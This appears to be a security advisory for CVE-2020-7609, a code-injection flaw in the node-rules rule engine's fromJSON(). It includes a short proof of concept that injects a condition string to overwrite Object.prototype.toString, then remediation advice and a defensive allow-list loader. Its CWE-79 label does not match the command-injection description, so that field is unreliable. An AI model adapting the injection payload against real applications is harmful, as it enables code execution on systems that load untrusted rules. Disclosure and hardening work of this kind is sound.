Command Injection

Affecting node-rules package, versions >=3.0.0 <5.0.0

Overview

node-rules is a lightweight forward-chaining rule engine, written in JavaScript.

Affected versions of this package are vulnerable to Command Injection. The injection point is at lines 152 and 153: the rules argument of the fromJSON() function is accepted from users without any sanitization, so the condition and consequence strings it carries run as code (see the proof of concept below).

Proof Of Concept

// Proof of concept: the condition and consequence strings are handed to
// fromJSON() unsanitized and are evaluated as code, so the "condition"
// below reaches Object.prototype through {}.__proto__.
var RuleEngine = require("node-rules");
var rules = {
  condition: "{}.__proto__.toString = 123",
  consequence: "console.log(123)"
};
var engine = new RuleEngine();
engine.fromJSON(rules);
// Shows whether Object.prototype.toString was replaced by the rule string.
console.log({}.toString);

Remediation

Upgrade node-rules to version 5.0.0 or higher.
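Beyond upgrading, an application that deserializes rules from untrusted input can refuse code strings altogether. The following is an added example, not node-rules' code or Snyk's: a hypothetical loader with the same fromJSON() call shape that accepts only structured conditions checked against an operator allow-list and validated field names, so the proof-of-concept payload above is rejected and Object.prototype is never touched.

```javascript
// Added example, not node-rules code: load rule definitions from untrusted JSON
// without evaluating strings as code. Conditions are structured objects matched
// against an operator allow-list; consequences may only assign plain values to
// validated field names on the fact object. All names here are hypothetical.
const OPS = new Map([
  ['eq', (a, b) => a === b],
  ['ne', (a, b) => a !== b],
  ['gt', (a, b) => a > b],
  ['lt', (a, b) => a < b],
  ['in', (a, b) => Array.isArray(b) && b.includes(a)],
]);
// Field names must be plain identifiers: this rejects "__proto__", dotted paths
// and reserved names, so a rule cannot reach the prototype chain.
const SAFE_FIELD = /^[A-Za-z][A-Za-z0-9_]{0,63}$/;
const RESERVED = new Set(['constructor', 'prototype']);

function assertField(name) {
  if (typeof name !== 'string' || !SAFE_FIELD.test(name) || RESERVED.has(name)) {
    throw new Error(`rejected field name: ${JSON.stringify(name)}`);
  }
  return name;
}
function compileCondition(c) {
  if (typeof c === 'string') throw new Error('condition must not be a code string');
  if (!c || typeof c !== 'object' || !OPS.has(c.op)) throw new Error('unknown operator');
  const field = assertField(c.field);
  const op = OPS.get(c.op);
  return (fact) => op(fact[field], c.value);
}
function compileConsequence(k) {
  if (typeof k === 'string') throw new Error('consequence must not be a code string');
  if (!k || typeof k !== 'object' || !k.set || typeof k.set !== 'object') {
    throw new Error('consequence must be {set: {field: value}}');
  }
  const assignments = Object.keys(k.set).map((f) => [assertField(f), k.set[f]]);
  return (fact) => { for (const [f, v] of assignments) fact[f] = v; return fact; };
}
// Same call shape as the vulnerable fromJSON(): accepts one rule or an array,
// as an object or JSON text, and returns rules holding only allow-listed functions.
function fromJSON(rulesJSON) {
  const parsed = typeof rulesJSON === 'string' ? JSON.parse(rulesJSON) : rulesJSON;
  return (Array.isArray(parsed) ? parsed : [parsed]).map((r) => ({
    condition: compileCondition(r.condition),
    consequence: compileConsequence(r.consequence),
  }));
}
function run(compiled, fact) {
  for (const r of compiled) if (r.condition(fact)) r.consequence(fact);
  return fact;
}
```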

CVSS Score

8.1 (high severity)
  • Attack Vector: Network
  • Attack Complexity: High
  • Privileges Required: None
  • User Interaction: None
  • Scope: Changed
  • Confidentiality: High
  • Integrity: Low
  • Availability: Low
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:L/A:L/E:P/RL:O/RC:C
Credit: Song Li of Johns Hopkins University
CVE: CVE-2020-7609
CWE: CWE-79
Snyk ID: SNYK-JS-NODERULES-560426
Disclosed: 10 Mar, 2020
Published: 17 Mar, 2020